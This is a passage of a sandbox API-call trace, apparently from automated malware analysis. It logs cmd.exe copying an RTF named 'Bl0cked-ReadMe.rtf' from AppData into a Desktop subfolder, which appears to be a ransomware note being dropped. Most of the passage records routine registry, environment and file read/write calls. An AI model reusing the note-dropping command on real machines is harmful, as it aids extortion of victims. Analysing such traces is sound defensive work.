lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegCloseKey (hKey=0x40) returned 0x0 [0141.828] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegCloseKey (hKey=0x40) returned 0x0 [0141.829] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.829] srand (_Seed=0x5b886370) [0141.829] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0141.829] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0141.829] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.829] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.830] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.830] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.830] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.830] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.830] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.830] GetEnvironmentStringsW () returned 0x2422f8* [0141.830] FreeEnvironmentStringsW (penv=0x2422f8) returned 1 [0141.830] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.830] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.830] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.830] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.830] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.830] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.830] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.830] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.830] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.830] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.830] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbd0, lpFilePart=0x18fbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbcc*="Desktop") returned 0x18 [0141.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.831] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.831] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.831] GetEnvironmentStringsW () returned 0x242b18* [0141.831] FreeEnvironmentStringsW (penv=0x242b18) returned 1 [0141.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.832] GetConsoleOutputCP () returned 0x1b5 [0141.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.832] GetUserDefaultLCID () returned 0x409 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd10, cchData=128 | out: lpLCData="1") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.833] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.834] GetConsoleTitleW (in: lpConsoleTitle=0x2308f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.835] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.835] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.835] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.835] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.835] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.835] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.835] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] GetFileType (hFile=0x7) returned 0x2 [0142.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.280] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fc08 | out: lpMode=0x18fc08) returned 1 [0142.280] _dup (_FileHandle=1) returned 3 [0142.280] _close (_FileHandle=1) returned 0 [0142.286] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.286] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18fbd8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.287] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.287] GetConsoleTitleW (in: lpConsoleTitle=0x18fa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.288] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.288] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.288] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.288] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.289] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f56c) returned 0x230ea0 [0142.289] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.289] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.289] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e478, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.289] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] GetFileType (hFile=0x54) returned 0x1 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e4d0 | out: lpFileSizeHigh=0x18e4d0*=0x0) returned 0x1632 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.290] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] GetFileType (hFile=0x4c) returned 0x1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] GetFileType (hFile=0x4c) returned 0x1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.292] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.293] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.294] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, 